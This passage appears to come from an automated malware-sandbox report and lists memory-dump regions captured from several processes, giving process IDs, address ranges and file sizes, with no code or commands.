                                                                                                                            • memory/2568-190-0x0000020869550000-0x00000208695C0000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              448KB

                                                                                                                            • memory/2592-188-0x000001C46CD70000-0x000001C46CDE0000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              448KB

                                                                                                                            • memory/2612-119-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/2612-130-0x0000000004F20000-0x0000000004F7C000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              368KB

                                                                                                                            • memory/2612-128-0x0000000004D9C000-0x0000000004E9D000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              1.0MB

                                                                                                                            • memory/2660-167-0x000000001B540000-0x000000001B542000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/2660-134-0x0000000000DA0000-0x0000000000DBC000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              112KB

                                                                                                                            • memory/2660-139-0x0000000000C80000-0x0000000000C81000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/2660-120-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/2660-129-0x0000000000C70000-0x0000000000C71000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/2660-126-0x0000000000670000-0x0000000000671000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/3144-246-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/3240-191-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/3240-193-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/3388-195-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/3388-199-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/3428-253-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/3692-203-0x00000000016B0000-0x00000000016B2000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/3692-200-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/3708-169-0x000001403F340000-0x000001403F3B0000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              448KB

                                                                                                                            • memory/3708-135-0x00007FF7977E4060-mapping.dmp
                                                                                                                            • memory/3844-331-0x0000026E9F500000-0x0000026E9F570000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              448KB

                                                                                                                            • memory/3844-163-0x0000026E9F1C0000-0x0000026E9F230000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              448KB

                                                                                                                            • memory/3844-132-0x0000026E9CD60000-0x0000026E9CDAB000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              300KB

                                                                                                                            • memory/3844-330-0x0000026E9F230000-0x0000026E9F27B000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              300KB

                                                                                                                            • memory/3948-343-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4104-250-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4104-272-0x0000000000FE4000-0x0000000000FE5000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/4104-254-0x0000000000FE0000-0x0000000000FE2000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/4136-334-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4180-204-0x00007FF7977E4060-mapping.dmp
                                                                                                                            • memory/4180-248-0x0000015231900000-0x0000015231A01000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              1.0MB

                                                                                                                            • memory/4180-208-0x000001522F340000-0x000001522F3B0000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              448KB

                                                                                                                            • memory/4180-207-0x000001522F060000-0x000001522F0AB000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              300KB

                                                                                                                            • memory/4224-360-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4284-326-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4316-209-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4316-211-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              88KB

                                                                                                                            • memory/4344-244-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4348-213-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4348-216-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/4392-218-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4392-229-0x00000000007C0000-0x00000000007C2000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/4404-319-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4424-222-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4424-230-0x0000000002A10000-0x0000000002A12000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/4424-240-0x0000000002A15000-0x0000000002A17000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/4424-239-0x0000000002A12000-0x0000000002A14000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/4424-241-0x0000000002A14000-0x0000000002A15000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/4432-266-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4472-238-0x0000000000D12000-0x0000000000D14000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/4472-242-0x0000000000D15000-0x0000000000D16000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/4472-225-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4472-231-0x0000000000D10000-0x0000000000D12000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/4496-245-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4576-232-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4576-235-0x0000000000CC0000-0x0000000000CCD000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              52KB

                                                                                                                            • memory/4636-258-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4752-344-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/4760-324-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5012-263-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5076-249-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5140-269-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5252-290-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5380-327-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5380-329-0x0000000001030000-0x000000000108C000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              368KB

                                                                                                                            • memory/5380-328-0x00000000010C3000-0x00000000011C4000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              1.0MB

                                                                                                                            • memory/5500-294-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5536-277-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5548-315-0x00000000037B0000-0x00000000037C0000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/5548-309-0x0000000003570000-0x0000000003580000-memory.dmp
                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/5548-278-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5616-368-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5684-361-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5856-367-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/5876-301-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6088-325-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6176-345-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6252-362-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6264-369-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6304-347-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6316-346-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6424-348-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6480-365-0x0000000000402F68-mapping.dmp
                                                                                                                            • memory/6484-349-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6500-364-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6540-350-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6588-351-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6612-352-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6632-366-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6672-353-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6828-354-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6856-355-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6944-356-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/6960-357-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/7060-358-0x0000000000000000-mapping.dmp
                                                                                                                            • memory/7092-359-0x0000000000000000-mapping.dmp